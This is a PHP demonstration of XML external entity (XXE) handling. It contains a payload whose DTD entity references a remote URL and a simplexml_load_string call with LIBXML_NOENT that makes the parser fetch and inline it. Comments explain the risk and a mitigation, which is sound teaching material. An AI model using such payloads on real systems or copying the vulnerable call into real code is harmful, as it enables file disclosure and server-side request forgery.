- var_dump: documentation ( source)
- simplexml_load_string: documentation ( source)
<?php
// Demonstration input for XML external entity (XXE) handling: the inline DTD
// declares an entity named "xxe" whose SYSTEM identifier is a remote URL, and
// the root element <foo> consists solely of a reference to that entity.
// Nowdoc is used because the document contains nothing to interpolate.
$payload = <<<'EOT'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "http://exploited.cz/robots.txt">]>
<foo>&xxe;</foo>
EOT;

// Safe baseline, kept commented out for comparison. With no libxml options,
// builds linked against libxml2 >= 2.9.0 do not substitute the external
// entity, so the element's text comes back empty.
// $doc = simplexml_load_string($payload);

// LIBXML_NOENT turns entity substitution ON (the name reads like the opposite).
// With it set, the parser resolves the SYSTEM identifier and inlines whatever
// it retrieves. On untrusted XML this is the classic XXE / SSRF footgun.
// Mitigation: never pass LIBXML_NOENT for input you do not control. LIBXML_NONET
// only blocks network fetches; it does not stop local file references.
$doc = simplexml_load_string($payload, null, LIBXML_NOENT);

// Casting the root element to string yields its text content, i.e. the expanded
// entity value when substitution happened. simplexml_load_string() returns
// false on a parse failure, which casts to an empty string here.
$rootText = (string)$doc;
var_dump($rootText);